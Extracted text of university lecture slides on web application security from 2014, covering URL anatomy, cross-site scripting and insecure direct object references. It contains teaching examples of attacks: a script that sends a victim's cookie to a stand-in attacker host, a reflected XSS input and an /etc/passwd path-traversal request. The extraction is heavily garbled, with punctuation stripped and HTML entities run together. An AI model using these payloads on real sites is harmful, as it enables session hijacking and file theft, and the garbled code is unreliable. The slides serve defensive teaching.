Secure Programming Lecture 11: Web Application Security II · the most important case of secure programming today. É Web is ubiquitous É browsers on almost every device É cloud

Secure Programming Lecture 11 WebApplication Security II

David Aspinall

3rd March 2014

Outline

Overview

Basics URLs

Output Filtering and XSS

Object references

Outline

Overview

Basics URLs

Output Filtering and XSS

Object references

Recap

Programming web applications securely is perhapsthe most important case of secure programming today

Eacute Web is ubiquitousEacute browsers on almost every deviceEacute cloud provisioned applications on the rise

Eacute Web technologies are ubiquitousEacute HTML5JavaScript platform on the riseEacute replacing Flash Silverlight etcEacute cross-platform app programming (Tizen PhoneGap)Eacute although JS has serious drawbacks as a PL

OWASP Top 10 list 2013

Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards

Outline

Overview

Basics URLs

Output Filtering and XSS

Object references

Structure of URLs

Full URLs specified in RFC 3986 have up to eight parts

URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment

1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)

Parts 3-5 together are called the authority

Scheme name

scheme

A case-insensitive string ends with a colon

Officially registered names assigned by IANA

Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9

historicalEacute eg spotify nfs soapbeep tv paparazzi

Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript

Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)

For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this lead to

Hierarchical file path

pathtoresource

Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mailHTML forms So

Eacute server may not presumeenforce query stringformat

Eacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible

Eg examples like http65xample63om

Moreover RFCs are not always followed

Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS

registrars

We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than you imagined

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequences

Eyeballs can easily be fooled when looking at URLs

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by these URLs

Examples from The Tangled Web

Outline

Overview

Basics URLs

Output Filtering and XSS

Object references

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

[Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Basics URLs

Output Filtering and XSS

Object references

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

A genius clearly

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)

as well as the named RFCs